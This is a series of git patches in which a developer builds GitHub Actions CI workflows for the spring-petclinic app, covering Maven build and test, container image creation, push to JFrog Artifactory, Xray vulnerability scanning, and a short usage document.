From 07654a28289f328124db26e3fae25fb68c540aae Mon Sep 17 00:00:00 2001 From: Matt York Date: Sat, 14 Oct 2023 08:43:09 +0100 Subject: [PATCH 01/35] trigger test --- triggerci.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 triggerci.txt diff --git a/triggerci.txt b/triggerci.txt new file mode 100644 index 000000000..d00491fd7 --- /dev/null +++ b/triggerci.txt @@ -0,0 +1 @@ +1 From d9c9ac99005785dfb101a09f4fd853ef249c68c7 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sat, 14 Oct 2023 08:57:16 +0100 Subject: [PATCH 02/35] Added a maven test into the build workflow --- .github/workflows/maven-build.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.github/workflows/maven-build.yml b/.github/workflows/maven-build.yml index 5de223fc6..3ea8368a8 100644 --- a/.github/workflows/maven-build.yml +++ b/.github/workflows/maven-build.yml @@ -27,3 +27,6 @@ jobs: cache: maven - name: Build with Maven Wrapper run: ./mvnw -B package + + - name: Run Maven tests + run: mvn test From 1b3d305a70f8431e85310f57cc5725fd0d10041f Mon Sep 17 00:00:00 2001 From: Matt York Date: Sat, 14 Oct 2023 09:12:13 +0100 Subject: [PATCH 03/35] Added a container workflow --- .github/workflows/build-container.yml | 30 +++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 .github/workflows/build-container.yml diff --git a/.github/workflows/build-container.yml b/.github/workflows/build-container.yml new file mode 100644 index 000000000..a55c2f496 --- /dev/null +++ b/.github/workflows/build-container.yml @@ -0,0 +1,30 @@ +# This workflow will build a Java project with Maven, and cache/restore any dependencies to improve the workflow execution time +# For more information see: https://help.github.com/actions/language-and-framework-guides/building-and-testing-java-with-maven + +name: Java CI with Maven Container + +on: + push: + branches: [ main ] + pull_request: + branches: [ main ] + +jobs: + build: + + runs-on: ubuntu-latest + strategy: + matrix: + java: [ '17' ] + + steps: + - uses: actions/checkout@v3 + - name: Set up JDK ${{matrix.java}} + uses: actions/setup-java@v2 + with: + java-version: ${{matrix.java}} + distribution: 'adopt' + cache: maven + - name: Build the Maven container image + run: ./mvnw spring-boot:build-image + From 7a810b45aaca70a753e57847793bcd72e69f4337 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sat, 14 Oct 2023 09:14:43 +0100 Subject: [PATCH 04/35] Added Container build step --- .github/workflows/maven-build.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.github/workflows/maven-build.yml b/.github/workflows/maven-build.yml index 3ea8368a8..82cab1b31 100644 --- a/.github/workflows/maven-build.yml +++ b/.github/workflows/maven-build.yml @@ -30,3 +30,6 @@ jobs: - name: Run Maven tests run: mvn test + + - name: Build the Maven container image + run: ./mvnw spring-boot:build-image From b8a57dcbd7c534cc9827a21fc25e03f2c131434f Mon Sep 17 00:00:00 2001 From: Matt York Date: Sat, 14 Oct 2023 09:28:45 +0100 Subject: [PATCH 05/35] Added debug docker image list --- .github/workflows/maven-build.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/.github/workflows/maven-build.yml b/.github/workflows/maven-build.yml index 82cab1b31..31bfe4346 100644 --- a/.github/workflows/maven-build.yml +++ b/.github/workflows/maven-build.yml @@ -33,3 +33,8 @@ jobs: - name: Build the Maven container image run: ./mvnw spring-boot:build-image + + # I add this step for debug. + # My local Linux laptop uses podman rather than docker, so this is a useful debug step. + - name: List all the container images on the runner + run: docker image list \ No newline at end of file From 7937bc69872a175e70e34f54382c12e96e84bc4b Mon Sep 17 00:00:00 2001 From: Matt York Date: Sat, 14 Oct 2023 12:01:43 +0100 Subject: [PATCH 06/35] Added jfrog to the build and test --- .github/workflows/maven-build.yml | 46 ++++++++++++++++++++++++++++++- 1 file changed, 45 insertions(+), 1 deletion(-) diff --git a/.github/workflows/maven-build.yml b/.github/workflows/maven-build.yml index 31bfe4346..672fe33b8 100644 --- a/.github/workflows/maven-build.yml +++ b/.github/workflows/maven-build.yml @@ -25,6 +25,13 @@ jobs: java-version: ${{matrix.java}} distribution: 'adopt' cache: maven + + - name: Setup JFrog CLI + uses: jfrog/setup-jfrog-cli@v3 + env: + JF_URL: ${{ secrets.JF_URL }} + JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} + - name: Build with Maven Wrapper run: ./mvnw -B package @@ -37,4 +44,41 @@ jobs: # I add this step for debug. # My local Linux laptop uses podman rather than docker, so this is a useful debug step. - name: List all the container images on the runner - run: docker image list \ No newline at end of file + run: docker image + + +####################################### + + + - name: Checkout code + uses: actions/checkout@v2 + + - name: Setup JFrog CLI + uses: jfrog/setup-jfrog-cli@v3 + env: + JF_URL: ${{ secrets.JF_URL }} + JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} + + - name: Retag image with jfrog repo + run: docker tag spring-petclinic:3.1.0-SNAPSHOT my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT + + - name: Build Tag and push Docker Image + env: + IMAGE_NAME: my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT + run: + jf docker push $IMAGE_NAME + + - name: Publish Build info With JFrog CLI + env: + # Generated and maintained by GitHub + JFROG_CLI_BUILD_NAME: spring-petclinic + # JFrog organization secret + JFROG_CLI_BUILD_NUMBER : ${{ github.run_number }} + run: | + # Export the build name and build nuber + # Collect environment variables for the build + jf rt build-collect-env + # Collect VCS details from git and add them to the build + jf rt build-add-git + # Publish build info + jf rt build-publish \ No newline at end of file From e5c8bd06371f8577195373922d43fdaf5ca50a95 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sat, 14 Oct 2023 12:42:12 +0100 Subject: [PATCH 07/35] Removed unused workflow --- .github/workflows/maven-build.yml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/.github/workflows/maven-build.yml b/.github/workflows/maven-build.yml index 672fe33b8..f0441d814 100644 --- a/.github/workflows/maven-build.yml +++ b/.github/workflows/maven-build.yml @@ -35,6 +35,9 @@ jobs: - name: Build with Maven Wrapper run: ./mvnw -B package + - name: Validate Maven dependencies + run: mvn dependency:analyze + - name: Run Maven tests run: mvn test @@ -67,6 +70,10 @@ jobs: IMAGE_NAME: my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT run: jf docker push $IMAGE_NAME + + - name: Scan for vulnerabilities + run: + jf scan - name: Publish Build info With JFrog CLI env: From 79ca1159d1b5efcc06c7b103f0a3563310b5c8bf Mon Sep 17 00:00:00 2001 From: Matt York Date: Sat, 14 Oct 2023 12:49:54 +0100 Subject: [PATCH 08/35] trying source patterns. CLeaned up unused workflow --- .github/workflows/build-container.yml | 30 --------------------------- .github/workflows/maven-build.yml | 2 +- triggerci.txt | 1 - 3 files changed, 1 insertion(+), 32 deletions(-) delete mode 100644 .github/workflows/build-container.yml delete mode 100644 triggerci.txt diff --git a/.github/workflows/build-container.yml b/.github/workflows/build-container.yml deleted file mode 100644 index a55c2f496..000000000 --- a/.github/workflows/build-container.yml +++ /dev/null @@ -1,30 +0,0 @@ -# This workflow will build a Java project with Maven, and cache/restore any dependencies to improve the workflow execution time -# For more information see: https://help.github.com/actions/language-and-framework-guides/building-and-testing-java-with-maven - -name: Java CI with Maven Container - -on: - push: - branches: [ main ] - pull_request: - branches: [ main ] - -jobs: - build: - - runs-on: ubuntu-latest - strategy: - matrix: - java: [ '17' ] - - steps: - - uses: actions/checkout@v3 - - name: Set up JDK ${{matrix.java}} - uses: actions/setup-java@v2 - with: - java-version: ${{matrix.java}} - distribution: 'adopt' - cache: maven - - name: Build the Maven container image - run: ./mvnw spring-boot:build-image - diff --git a/.github/workflows/maven-build.yml b/.github/workflows/maven-build.yml index f0441d814..719344e2b 100644 --- a/.github/workflows/maven-build.yml +++ b/.github/workflows/maven-build.yml @@ -73,7 +73,7 @@ jobs: - name: Scan for vulnerabilities run: - jf scan + jf scan * - name: Publish Build info With JFrog CLI env: diff --git a/triggerci.txt b/triggerci.txt deleted file mode 100644 index d00491fd7..000000000 --- a/triggerci.txt +++ /dev/null @@ -1 +0,0 @@ -1 From 6cba61ff99f9ee8deaf60033bf7844835a32068c Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 11:49:14 +0100 Subject: [PATCH 09/35] Created a minimal workflow --- .github/workflows/ci-minimal.yml | 91 ++++++++++++++++++++++++++++++++ 1 file changed, 91 insertions(+) create mode 100644 .github/workflows/ci-minimal.yml diff --git a/.github/workflows/ci-minimal.yml b/.github/workflows/ci-minimal.yml new file mode 100644 index 000000000..a2ed11a2f --- /dev/null +++ b/.github/workflows/ci-minimal.yml @@ -0,0 +1,91 @@ +# This workflow will build a Java project with Maven, and cache/restore any dependencies to improve the workflow execution time +# For more information see: https://help.github.com/actions/language-and-framework-guides/building-and-testing-java-with-maven + +name: Minimal build requirements for the petclinic application. + +# The workflow will execute on Push / PR as well as manually running. +on: + push: + branches: [ main ] + pull_request: + branches: [ main ] + workflow_dispatch: + +# The actual workflow jobs. I've split some of these up to +# allow more flexibility in future. +jobs: + + # The source build job is designed to ensure that the source... + # * builds + # * + source-build: + + runs-on: ubuntu-latest + strategy: + matrix: + java: [ '17' ] + + steps: + # Checkout the current repository + - uses: actions/checkout@v3 + + # Set up Java 17 on the runner + - name: Set up JDK ${{matrix.java}} + uses: actions/setup-java@v2 + with: + java-version: ${{matrix.java}} + distribution: 'adopt' + cache: maven + + # Configure the JFrog CLI with the secrets we've saved. + - name: Setup JFrog CLI + uses: jfrog/setup-jfrog-cli@v3 + env: + JF_URL: ${{ secrets.JF_URL }} + JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} + + # Use the Maven wrapper to build the code. + - name: Build the Petclinic Package + run: ./mvnw -B package + + # Run the maven dependency analyzer + - name: Validate Maven dependencies + run: mvn dependency:analyze + + # Run the maven tests + - name: Run Maven tests + run: mvn test + + # Build the container image + - name: Build the Maven container image + run: ./mvnw spring-boot:build-image + + # In order to upload the image to Artifactory, we'll retag the image. + - name: Retag image with jfrog repo + run: docker tag spring-petclinic:3.1.0-SNAPSHOT my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT + + # We push the image into artifactory + - name: Push Docker Image to Artifactory + env: + IMAGE_NAME: my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT + run: + jf docker push $IMAGE_NAME + + # - name: Scan for vulnerabilities + # run: + # jf scan * + + # - name: Publish Build info With JFrog CLI + # env: + # # Generated and maintained by GitHub + # JFROG_CLI_BUILD_NAME: spring-petclinic + # # JFrog organization secret + # JFROG_CLI_BUILD_NUMBER : ${{ github.run_number }} + # run: | + # # Export the build name and build nuber + # # Collect environment variables for the build + # jf rt build-collect-env + # # Collect VCS details from git and add them to the build + # jf rt build-add-git + # # Publish build info + # jf rt build-publish \ No newline at end of file From ccc963f78d89edcc5fe9e43b8a9cc0f551b9c3c8 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 11:59:47 +0100 Subject: [PATCH 10/35] Added a more feature rich workflow --- .../{maven-build.yml => ci-learning.yml} | 78 +++++++++++++++++-- 1 file changed, 72 insertions(+), 6 deletions(-) rename .github/workflows/{maven-build.yml => ci-learning.yml} (54%) diff --git a/.github/workflows/maven-build.yml b/.github/workflows/ci-learning.yml similarity index 54% rename from .github/workflows/maven-build.yml rename to .github/workflows/ci-learning.yml index 719344e2b..f63d763f8 100644 --- a/.github/workflows/maven-build.yml +++ b/.github/workflows/ci-learning.yml @@ -10,7 +10,11 @@ on: branches: [ main ] jobs: - build: + + # The source build job is designed to ensure that the source... + # * builds + # * + source-build: runs-on: ubuntu-latest strategy: @@ -48,10 +52,6 @@ jobs: # My local Linux laptop uses podman rather than docker, so this is a useful debug step. - name: List all the container images on the runner run: docker image - - -####################################### - - name: Checkout code uses: actions/checkout@v2 @@ -88,4 +88,70 @@ jobs: # Collect VCS details from git and add them to the build jf rt build-add-git # Publish build info - jf rt build-publish \ No newline at end of file + jf rt build-publish + + + + +############################## + + container-build: + + runs-on: ubuntu-latest + strategy: + matrix: + java: [ '17' ] + + steps: + - uses: actions/checkout@v3 + - name: Set up JDK ${{matrix.java}} + uses: actions/setup-java@v2 + with: + java-version: ${{matrix.java}} + distribution: 'adopt' + cache: maven + + - name: Build the Maven container image + run: ./mvnw spring-boot:build-image + + # I add this step for debug. + # My local Linux laptop uses podman rather than docker, so this is a useful debug step. + - name: List all the container images on the runner + run: docker image + + - name: Checkout code + uses: actions/checkout@v2 + + - name: Setup JFrog CLI + uses: jfrog/setup-jfrog-cli@v3 + env: + JF_URL: ${{ secrets.JF_URL }} + JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} + + - name: Retag image with jfrog repo + run: docker tag spring-petclinic:3.1.0-SNAPSHOT my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT + + - name: Build Tag and push Docker Image + env: + IMAGE_NAME: my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT + run: + jf docker push $IMAGE_NAME + + - name: Scan for vulnerabilities + run: + jf scan * + + - name: Publish Build info With JFrog CLI + env: + # Generated and maintained by GitHub + JFROG_CLI_BUILD_NAME: spring-petclinic + # JFrog organization secret + JFROG_CLI_BUILD_NUMBER : ${{ github.run_number }} + run: | + # Export the build name and build nuber + # Collect environment variables for the build + jf rt build-collect-env + # Collect VCS details from git and add them to the build + jf rt build-add-git + # Publish build info + jf rt build-publish From 8c4714770384c35a3713d342b1b9b5f2f0ff5387 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 12:01:33 +0100 Subject: [PATCH 11/35] fixed typo --- .github/workflows/ci-learning.yml | 102 +++++++++++++++--------------- 1 file changed, 51 insertions(+), 51 deletions(-) diff --git a/.github/workflows/ci-learning.yml b/.github/workflows/ci-learning.yml index f63d763f8..25722c3d0 100644 --- a/.github/workflows/ci-learning.yml +++ b/.github/workflows/ci-learning.yml @@ -95,63 +95,63 @@ jobs: ############################## - container-build: + container-build: - runs-on: ubuntu-latest - strategy: - matrix: - java: [ '17' ] + runs-on: ubuntu-latest + strategy: + matrix: + java: [ '17' ] - steps: - - uses: actions/checkout@v3 - - name: Set up JDK ${{matrix.java}} - uses: actions/setup-java@v2 - with: - java-version: ${{matrix.java}} - distribution: 'adopt' - cache: maven + steps: + - uses: actions/checkout@v3 + - name: Set up JDK ${{matrix.java}} + uses: actions/setup-java@v2 + with: + java-version: ${{matrix.java}} + distribution: 'adopt' + cache: maven - - name: Build the Maven container image - run: ./mvnw spring-boot:build-image + - name: Build the Maven container image + run: ./mvnw spring-boot:build-image - # I add this step for debug. - # My local Linux laptop uses podman rather than docker, so this is a useful debug step. - - name: List all the container images on the runner - run: docker image + # I add this step for debug. + # My local Linux laptop uses podman rather than docker, so this is a useful debug step. + - name: List all the container images on the runner + run: docker image - - name: Checkout code - uses: actions/checkout@v2 + - name: Checkout code + uses: actions/checkout@v2 - - name: Setup JFrog CLI - uses: jfrog/setup-jfrog-cli@v3 - env: - JF_URL: ${{ secrets.JF_URL }} - JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} + - name: Setup JFrog CLI + uses: jfrog/setup-jfrog-cli@v3 + env: + JF_URL: ${{ secrets.JF_URL }} + JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} - - name: Retag image with jfrog repo - run: docker tag spring-petclinic:3.1.0-SNAPSHOT my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT + - name: Retag image with jfrog repo + run: docker tag spring-petclinic:3.1.0-SNAPSHOT my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT - - name: Build Tag and push Docker Image - env: - IMAGE_NAME: my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT - run: - jf docker push $IMAGE_NAME + - name: Build Tag and push Docker Image + env: + IMAGE_NAME: my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT + run: + jf docker push $IMAGE_NAME - - name: Scan for vulnerabilities - run: - jf scan * - - - name: Publish Build info With JFrog CLI - env: - # Generated and maintained by GitHub - JFROG_CLI_BUILD_NAME: spring-petclinic - # JFrog organization secret - JFROG_CLI_BUILD_NUMBER : ${{ github.run_number }} - run: | - # Export the build name and build nuber - # Collect environment variables for the build - jf rt build-collect-env - # Collect VCS details from git and add them to the build - jf rt build-add-git - # Publish build info - jf rt build-publish + - name: Scan for vulnerabilities + run: + jf scan * + + - name: Publish Build info With JFrog CLI + env: + # Generated and maintained by GitHub + JFROG_CLI_BUILD_NAME: spring-petclinic + # JFrog organization secret + JFROG_CLI_BUILD_NUMBER : ${{ github.run_number }} + run: | + # Export the build name and build nuber + # Collect environment variables for the build + jf rt build-collect-env + # Collect VCS details from git and add them to the build + jf rt build-add-git + # Publish build info + jf rt build-publish From bd77e6ad733aaf41c6e64d15feb128fa81a51cc8 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 12:29:16 +0100 Subject: [PATCH 12/35] testing out some new ideas for the workflow --- .github/workflows/ci-learning.yml | 67 ++++++++++++++++++++++++++++++- 1 file changed, 66 insertions(+), 1 deletion(-) diff --git a/.github/workflows/ci-learning.yml b/.github/workflows/ci-learning.yml index 25722c3d0..61ebb64e8 100644 --- a/.github/workflows/ci-learning.yml +++ b/.github/workflows/ci-learning.yml @@ -1,7 +1,7 @@ # This workflow will build a Java project with Maven, and cache/restore any dependencies to improve the workflow execution time # For more information see: https://help.github.com/actions/language-and-framework-guides/building-and-testing-java-with-maven -name: Java CI with Maven +name: Java CI with Maven (more complex) on: push: @@ -155,3 +155,68 @@ jobs: jf rt build-add-git # Publish build info jf rt build-publish + - name: Export the built image to a tar file + env: + IMAGE_NAME: my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT + run: docker save $IMAGE_NAME > /tmp/petclinic.tar + + - name: Upload Image as an artifact + uses: actions/upload-artifact@v2 + with: + name: app + path: /tmp/petclinic.tar + + + publish-build: + needs: [source-build, container-build] + + runs-on: ubuntu-latest + strategy: + matrix: + java: [ '17' ] + + steps: + - name: Download artifacts (Docker images) from previous workflows + uses: actions/download-artifact@v2 + + - name: Load Docker images from previous workflows + run: | + docker load --input /tmp/petclinic.tar + + - name: List all the container images on the runner + run: docker image ls + + + - name: Setup JFrog CLI + uses: jfrog/setup-jfrog-cli@v3 + env: + JF_URL: ${{ secrets.JF_URL }} + JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} + + - name: Retag image with jfrog repo + run: docker tag spring-petclinic:3.1.0-SNAPSHOT my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT + + - name: Build Tag and push Docker Image + env: + IMAGE_NAME: my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT + run: + jf docker push $IMAGE_NAME + + - name: Scan for vulnerabilities + run: + jf scan * + + - name: Publish Build info With JFrog CLI + env: + # Generated and maintained by GitHub + JFROG_CLI_BUILD_NAME: spring-petclinic + # JFrog organization secret + JFROG_CLI_BUILD_NUMBER : ${{ github.run_number }} + run: | + # Export the build name and build nuber + # Collect environment variables for the build + jf rt build-collect-env + # Collect VCS details from git and add them to the build + jf rt build-add-git + # Publish build info + jf rt build-publish \ No newline at end of file From 2c065555704abc5f64550f04265211a9bc743803 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 12:37:34 +0100 Subject: [PATCH 13/35] optimised workflow --- .github/workflows/ci-learning.yml | 84 +------------------------------ 1 file changed, 1 insertion(+), 83 deletions(-) diff --git a/.github/workflows/ci-learning.yml b/.github/workflows/ci-learning.yml index 61ebb64e8..a118c55fd 100644 --- a/.github/workflows/ci-learning.yml +++ b/.github/workflows/ci-learning.yml @@ -45,51 +45,7 @@ jobs: - name: Run Maven tests run: mvn test - - name: Build the Maven container image - run: ./mvnw spring-boot:build-image - - # I add this step for debug. - # My local Linux laptop uses podman rather than docker, so this is a useful debug step. - - name: List all the container images on the runner - run: docker image - - - name: Checkout code - uses: actions/checkout@v2 - - - name: Setup JFrog CLI - uses: jfrog/setup-jfrog-cli@v3 - env: - JF_URL: ${{ secrets.JF_URL }} - JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} - - - name: Retag image with jfrog repo - run: docker tag spring-petclinic:3.1.0-SNAPSHOT my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT - - - name: Build Tag and push Docker Image - env: - IMAGE_NAME: my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT - run: - jf docker push $IMAGE_NAME - - - name: Scan for vulnerabilities - run: - jf scan * - - - name: Publish Build info With JFrog CLI - env: - # Generated and maintained by GitHub - JFROG_CLI_BUILD_NAME: spring-petclinic - # JFrog organization secret - JFROG_CLI_BUILD_NUMBER : ${{ github.run_number }} - run: | - # Export the build name and build nuber - # Collect environment variables for the build - jf rt build-collect-env - # Collect VCS details from git and add them to the build - jf rt build-add-git - # Publish build info - jf rt build-publish - + @@ -114,47 +70,9 @@ jobs: - name: Build the Maven container image run: ./mvnw spring-boot:build-image - # I add this step for debug. - # My local Linux laptop uses podman rather than docker, so this is a useful debug step. - - name: List all the container images on the runner - run: docker image - - - name: Checkout code - uses: actions/checkout@v2 - - - name: Setup JFrog CLI - uses: jfrog/setup-jfrog-cli@v3 - env: - JF_URL: ${{ secrets.JF_URL }} - JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} - - name: Retag image with jfrog repo run: docker tag spring-petclinic:3.1.0-SNAPSHOT my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT - - name: Build Tag and push Docker Image - env: - IMAGE_NAME: my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT - run: - jf docker push $IMAGE_NAME - - - name: Scan for vulnerabilities - run: - jf scan * - - - name: Publish Build info With JFrog CLI - env: - # Generated and maintained by GitHub - JFROG_CLI_BUILD_NAME: spring-petclinic - # JFrog organization secret - JFROG_CLI_BUILD_NUMBER : ${{ github.run_number }} - run: | - # Export the build name and build nuber - # Collect environment variables for the build - jf rt build-collect-env - # Collect VCS details from git and add them to the build - jf rt build-add-git - # Publish build info - jf rt build-publish - name: Export the built image to a tar file env: IMAGE_NAME: my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT From 9b9b8f8ee7f5bec1aa8a291f99ed0bebd5426932 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 12:44:47 +0100 Subject: [PATCH 14/35] Fixed typo on publish build --- .github/workflows/ci-learning.yml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/.github/workflows/ci-learning.yml b/.github/workflows/ci-learning.yml index a118c55fd..8d9e88531 100644 --- a/.github/workflows/ci-learning.yml +++ b/.github/workflows/ci-learning.yml @@ -45,11 +45,6 @@ jobs: - name: Run Maven tests run: mvn test - - - - -############################## container-build: @@ -96,6 +91,10 @@ jobs: steps: - name: Download artifacts (Docker images) from previous workflows uses: actions/download-artifact@v2 + with: + name: app + path: /tmp/petclinic.tar + - name: Load Docker images from previous workflows run: | From fd063f4818f8cb02f2194a7ea960ea2f0b2afede Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 12:50:14 +0100 Subject: [PATCH 15/35] typo --- .github/workflows/ci-learning.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/ci-learning.yml b/.github/workflows/ci-learning.yml index 8d9e88531..f272f5fc6 100644 --- a/.github/workflows/ci-learning.yml +++ b/.github/workflows/ci-learning.yml @@ -93,12 +93,12 @@ jobs: uses: actions/download-artifact@v2 with: name: app - path: /tmp/petclinic.tar - + path: /tmp/petclinic/ + - name: Load Docker images from previous workflows run: | - docker load --input /tmp/petclinic.tar + docker load --input /tmp/petclinic/petclinic.tar - name: List all the container images on the runner run: docker image ls From 7b928ec15e2cd72e52d2d38f0f368703fa3925f7 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 12:58:08 +0100 Subject: [PATCH 16/35] added container image scan --- .github/workflows/ci-learning.yml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/.github/workflows/ci-learning.yml b/.github/workflows/ci-learning.yml index f272f5fc6..4d9022e0e 100644 --- a/.github/workflows/ci-learning.yml +++ b/.github/workflows/ci-learning.yml @@ -110,18 +110,15 @@ jobs: JF_URL: ${{ secrets.JF_URL }} JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} - - name: Retag image with jfrog repo - run: docker tag spring-petclinic:3.1.0-SNAPSHOT my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT - - name: Build Tag and push Docker Image env: IMAGE_NAME: my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT run: jf docker push $IMAGE_NAME - - name: Scan for vulnerabilities + - name: Scan Image for vulnerabilities run: - jf scan * + jf docker scan my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT - name: Publish Build info With JFrog CLI env: From 89f42236c25571709e0a3b2b73ae10aee4c07336 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 13:04:44 +0100 Subject: [PATCH 17/35] Simplified the artifactory metadata --- .github/workflows/ci-learning.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/ci-learning.yml b/.github/workflows/ci-learning.yml index 4d9022e0e..182be750e 100644 --- a/.github/workflows/ci-learning.yml +++ b/.github/workflows/ci-learning.yml @@ -129,8 +129,8 @@ jobs: run: | # Export the build name and build nuber # Collect environment variables for the build - jf rt build-collect-env + # jf rt build-collect-env # Collect VCS details from git and add them to the build - jf rt build-add-git + # jf rt build-add-git # Publish build info - jf rt build-publish \ No newline at end of file + # jf rt build-publish \ No newline at end of file From 19d0e71ea8b28c6a7d95cf3cd6378a0cbddb8abe Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 13:12:29 +0100 Subject: [PATCH 18/35] changed order of the image scan --- .github/workflows/ci-learning.yml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/.github/workflows/ci-learning.yml b/.github/workflows/ci-learning.yml index 182be750e..19fabaf76 100644 --- a/.github/workflows/ci-learning.yml +++ b/.github/workflows/ci-learning.yml @@ -110,16 +110,18 @@ jobs: JF_URL: ${{ secrets.JF_URL }} JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} + - name: Scan Image for vulnerabilities + run: + jf docker scan my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT + + - name: Build Tag and push Docker Image env: IMAGE_NAME: my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT run: jf docker push $IMAGE_NAME - - name: Scan Image for vulnerabilities - run: - jf docker scan my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT - + - name: Publish Build info With JFrog CLI env: # Generated and maintained by GitHub From 5eab3a368a7a9608058697bc7a0dc065ba75adf0 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 14:31:11 +0100 Subject: [PATCH 19/35] Added a simple.md to the documentation. --- Docs/simple.md | 65 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 Docs/simple.md diff --git a/Docs/simple.md b/Docs/simple.md new file mode 100644 index 000000000..e8a2b68e1 --- /dev/null +++ b/Docs/simple.md @@ -0,0 +1,65 @@ +# The "Simple" GitHub Actions pipeline + +This repository makes use of a GitHub actions pipeline. We'll be using a workflow to achieve this. + +## The steps +In order to successfully build, our workflow must + +1. Pull the code from the main branch of the git repo [here](https://github.com/spring-projects/spring-petclinic). +1. Ensure that Java 17 is installed on the GitHub runner. +1. Use the Maven wrapper to build the source. +1. Run the Maven tests for the source +1. Use Maven to check dependencies +1. Package the code into a docker container +1. tag the container with the required name +1. Push the container into the Artifactory Repository + + + +# Using the image +In order to use the image, you will first need docker installed on your local system. + +__Authenticate to your container registry with your login__ +```console +foo@bar:~$ docker login -u [your-login] my0373.jfrog.io +``` +__Note:__ +*Please replace ```[your-login]``` with your artifactory login.* + + +__Pull the container image to your local system__ +```console +foo@bar:~$ docker pull my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT +``` + +__Run the container image.__ +```console +foo@bar:~$ docker run -d -p 8080:8080 spring-petclinic:3.1.0-SNAPSHOT +``` + +__Note:__ +*Here I am exposing the site on port 8080. Please change to your requirements.* + + +The Image can be viewed in artifactory [here](https://my0373.jfrog.io/ui/repos/tree/General/my0373-docker-local/spring-petclinic). + +# Testing the application +Once the container is running, you should be able to connect on port 8080 on the target system. + +Assuming this is your local system, open a browser to http://127.0.0.1:8080/. + + + + +# Security scan +As part of the build, I've executed an xray scan of the repository and attached the scans in the + +### Code Compilation +The first step of the build process is to build + +GitHub link to the repo including + +Github Actions workflow files within that repo +Docker file within that repo +readme.md file explaining the work and how to run the project +Bonus Deliverable: XRay Scan Data export (JSON format) for your image From 765d361d077f89d6ba738d0853f2d525ee6f35c8 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 14:32:47 +0100 Subject: [PATCH 20/35] Removed manual workflow trigger --- .github/workflows/ci-minimal.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/ci-minimal.yml b/.github/workflows/ci-minimal.yml index a2ed11a2f..1837e3f1d 100644 --- a/.github/workflows/ci-minimal.yml +++ 